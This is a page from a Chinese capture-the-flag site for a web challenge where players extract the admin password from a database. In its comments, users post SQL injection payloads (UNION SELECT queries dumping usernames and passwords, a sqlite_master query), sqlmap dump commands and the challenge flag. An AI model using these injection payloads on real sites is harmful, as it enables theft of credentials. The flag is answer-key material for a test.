Virtual ShopWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
heyile
一血奖励:
0金币
解 决:
389
提 示:
描 述:
So, let's see if you can retrieve the `password` of the admin which\
\ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\
\ F100w"
评分(0)
暂无评分
解题动态
another2001 攻破了该题 7天前
Air51930 攻破了该题 8天前
18270753375 攻破了该题 14天前
绪言qaq 攻破了该题 19天前
hbynb 攻破了该题 19天前
1348931180 攻破了该题 21天前
luck1219 攻破了该题 22天前
hengdonghui 攻破了该题 24天前
glkdfjgkl 攻破了该题 27天前
eason2023 攻破了该题 27天前
zrc2682 攻破了该题 28天前
Ethan552525 攻破了该题 28天前
out不慢 攻破了该题 1月前
liang123456 攻破了该题 1月前
solomom 攻破了该题 1月前
鸡小哲 攻破了该题 1月前
caocao 攻破了该题 1月前
suona 攻破了该题 1月前
ndaygril 攻破了该题 1月前
评论
tdwj 3月前
举报
一开始' union select 1,2,database(),4--+报错,看提示' union select 1,2,username,password from users--+倒是可出flag
欧尼酱001 1年前
举报
1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}
WCRH 1年前
举报
这又不是post请求,你还保存上txt了
.⎛⎝•̀ω•́⎠⎞. 1年前
举报
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF 2年前
举报
union查询
xiaobai568 2年前
举报
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello 2年前
举报
sqlmap即可
chaoge 2年前
举报
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou 2年前
举报
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+
SS3B 2年前
举报
sqlmap一下子就出来了
hopeinhand 2年前
举报
联合查询注入,表名、列名、用户名全给了,都没啥好说的了